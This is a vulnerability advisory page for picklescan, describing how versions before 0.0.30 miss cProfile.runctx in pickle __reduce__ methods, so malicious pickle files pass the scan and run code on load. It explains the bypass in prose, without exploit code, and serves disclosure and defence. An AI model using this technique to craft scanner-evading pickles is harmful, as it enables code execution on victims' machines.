VYPR
← All advisories
Unrated severityNVD Advisory· Published Jun 21, 2026

picklescan - Remote Code Execution via Undetected cProfile.runctx in Pickle Files

CVE-2025-71378

Description

picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file reduce methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load().

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1

Patches

Vulnerability mechanics

Root cause

"Missing detection of cProfile.runctx in the list of dangerous pickle reduce functions."

Attack vector

An attacker crafts a malicious pickle file whose `__reduce__` method returns `cProfile.runctx` with an arbitrary command string. When a victim uses `pickle.load()` on this file after `picklescan` reports it as safe, the `cProfile.runctx` call executes the embedded command, achieving remote code execution [ref_id=1].

Affected code

The `picklescan` library before version 0.0.30 fails to detect `cProfile.runctx` function calls inside pickle file `__reduce__` methods, allowing malicious pickle files to bypass the scanner's safety checks.

What the fix does

The patch adds `cProfile.runctx` to the list of dangerous functions that `picklescan` inspects for in pickle `__reduce__` methods. Without this addition, the scanner reported the file as safe even though `pickle.load()` would execute arbitrary code via the built-in `cProfile.runctx` call.

Preconditions

  • configVictim uses picklescan < 0.0.30 to scan a pickle file before loading it
  • inputVictim calls pickle.load() on the scanned file
  • inputAttacker supplies a pickle file whose __reduce__ method returns cProfile.runctx with a command

Generated on Jun 22, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.